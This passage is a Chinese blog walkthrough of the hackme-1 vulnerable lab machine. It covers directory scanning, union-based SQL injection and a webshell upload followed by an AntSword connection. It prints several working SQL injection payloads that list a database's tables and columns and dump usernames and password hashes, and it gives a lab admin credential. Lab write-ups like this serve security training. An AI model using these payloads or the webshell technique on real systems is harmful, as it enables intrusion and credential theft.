hackme-1靶机渗透详解

1.目录扫描

我们先扫描一下目录 看到有四个目录 分别点进去看下

发现有一个登录界面一个注册界面 我们注册一个账户 登录看看

2.SQL注入

登录后发现有搜索框 可以搜索书名 我们尝试 SQL注入测试 主要搜索框要求搜索书名 

经过简单的逻辑测试 发现确实存在SQL注入漏洞

接下来就是sql注入的一系列 order by 判断字段数是三个 利用联合查询 union 判断回显位置 

查询当前数据库

-1' union select database(),2,3#

查看webapphacking库所有的表

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

查看users表中所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

查看表中user,password字段数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

然后进行MD5解密

3.文件上传漏洞

使用superadmin用户登录 密码:Uncrackable

发现可以上传文件

提示我们上传成功

来到上传文档 发现一句话木马文件已经存在了 

4.远程连接

去访问我们的木马文件让其运行成功后 拿中国蚁剑链接成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值